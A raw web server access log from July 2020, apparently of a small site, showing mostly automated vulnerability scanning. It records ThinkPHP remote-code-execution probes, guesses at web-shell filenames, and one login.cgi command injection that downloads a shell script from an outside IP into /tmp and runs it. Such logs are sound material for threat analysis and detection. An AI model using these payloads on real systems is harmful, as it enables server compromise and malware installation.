118.24.22.175 - - [02/Jul/2020:20:47:50 +0200] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:51 +0200] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:51 +0200] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:52 +0200] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:56 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:57 +0200] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:57 +0200] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:47:59 +0200] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:48:00 +0200] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:48:01 +0200] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
178.93.7.61 - - [02/Jul/2020:20:48:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:48:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.29 - - [02/Jul/2020:20:49:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
118.24.22.175 - - [02/Jul/2020:20:49:32 +0200] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:32 +0200] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:32 +0200] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:32 +0200] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:33 +0200] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:33 +0200] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:34 +0200] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:35 +0200] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:49:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:20:49:35 +0200] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:35 +0200] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:37 +0200] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:39 +0200] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:39 +0200] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:40 +0200] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:41 +0200] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:47 +0200] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:47 +0200] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:48 +0200] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:51 +0200] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:51 +0200] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:49:52 +0200] "GET /images/stories/cmd.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:50:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.93.187.124 - - [02/Jul/2020:20:50:48 +0200] "HEAD /dump.zip HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:12 +0200] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:14 +0200] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:14 +0200] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:15 +0200] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:17 +0200] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:18 +0200] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:19 +0200] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:21 +0200] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:21 +0200] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:27 +0200] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:29 +0200] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:31 +0200] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:31 +0200] "GET /coonig.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:51:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:20:51:37 +0200] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:38 +0200] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:39 +0200] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:39 +0200] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:51:41 +0200] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:52:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.221.80.157 - - [02/Jul/2020:20:52:41 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
202.44.251.151 - - [02/Jul/2020:20:52:54 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
118.24.22.175 - - [02/Jul/2020:20:53:22 +0200] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:53:24 +0200] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:53:29 +0200] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:53:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:20:53:43 +0200] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
220.133.102.94 - - [02/Jul/2020:20:54:26 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:20:54:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:20:55:24 +0200] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
122.116.197.240 - - [02/Jul/2020:20:55:26 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
118.24.22.175 - - [02/Jul/2020:20:55:30 +0200] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:31 +0200] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:33 +0200] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:33 +0200] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:34 +0200] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:34 +0200] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:55:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:20:55:35 +0200] "GET /1ts.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:35 +0200] "GET /haiyan.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:36 +0200] "GET /phpdm.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:38 +0200] "GET /root.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:38 +0200] "GET /5678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:55:39 +0200] "GET /root11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
220.132.34.40 - - [02/Jul/2020:20:55:49 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
14.245.186.248 - - [02/Jul/2020:20:56:05 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
114.34.228.173 - - [02/Jul/2020:20:56:15 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
58.215.139.49 - - [02/Jul/2020:20:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:20:56:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.30 - - [02/Jul/2020:20:56:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:20:57:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:20:57:51 +0200] "GET /xiu.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:57:53 +0200] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
220.134.177.27 - - [02/Jul/2020:20:58:22 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.132.99.209 - - [02/Jul/2020:20:58:23 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:20:58:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
14.254.246.232 - - [02/Jul/2020:20:58:39 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
143.255.243.126 - - [02/Jul/2020:20:59:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
109.73.177.140 - - [02/Jul/2020:20:59:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:20:59:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.93.187.124 - - [02/Jul/2020:20:59:54 +0200] "HEAD /dump.zip HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:20:59:58 +0200] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:00:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:21:01:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [02/Jul/2020:21:01:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:21:01:53 +0200] "POST /xw1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:02:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.249.102.84 - - [02/Jul/2020:21:02:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:03:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:03:43 +0200] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
177.130.92.179 - - [02/Jul/2020:21:04:23 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:04:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.187.122.29 - - [02/Jul/2020:21:04:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.31/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
220.133.168.156 - - [02/Jul/2020:21:05:24 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
118.24.22.175 - - [02/Jul/2020:21:05:32 +0200] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:05:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.30 - - [02/Jul/2020:21:05:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
175.181.37.14 - - [02/Jul/2020:21:06:11 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.132.141.125 - - [02/Jul/2020:21:06:19 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.132.131.6 - - [02/Jul/2020:21:06:20 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:06:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.222.191 - - [02/Jul/2020:21:07:14 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.132.127.40 - - [02/Jul/2020:21:07:29 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:07:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:07:47 +0200] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:08:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.106.181 - - [02/Jul/2020:21:08:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
118.24.22.175 - - [02/Jul/2020:21:09:18 +0200] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:09:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:09:49 +0200] "POST /s.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
